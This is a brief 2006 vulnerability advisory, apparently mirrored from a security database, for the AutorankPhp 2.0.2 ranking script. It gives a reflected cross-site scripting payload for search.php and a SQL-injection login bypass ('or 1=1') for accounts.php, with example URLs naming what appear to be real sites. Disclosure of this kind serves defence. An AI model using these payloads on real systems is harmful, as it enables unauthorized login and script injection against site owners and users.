Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:12011
HistoryMar 29, 2006 - 12:00 a.m.

SQL-Injection in AutorankPhp 2.0.2

2006-03-2900:00:00
vulners.com
9

Advisory: SQL-Injection in AutorankPhp 2.0.2

Уязвимость/Vulnerability:
Межсайтовый скриптинг/Cross Site Scripting

Уязвимый скрипт/Vulnerable script: search.php

Exploit:

http://www.teifa.net/rank/search.php?key=<script>alert()</script>&cat=Overall

Уязвимость/Vulnerability:
SQL-injection

Уязвимый скрипт/Vulnerable script: accounts.php

Exploit:

http://www.top48hours.com/autorankphp/accounts.php?login
Login - admin
Password - ' or 1=1 /*


Cyber Lords Team
www.cyberlords.net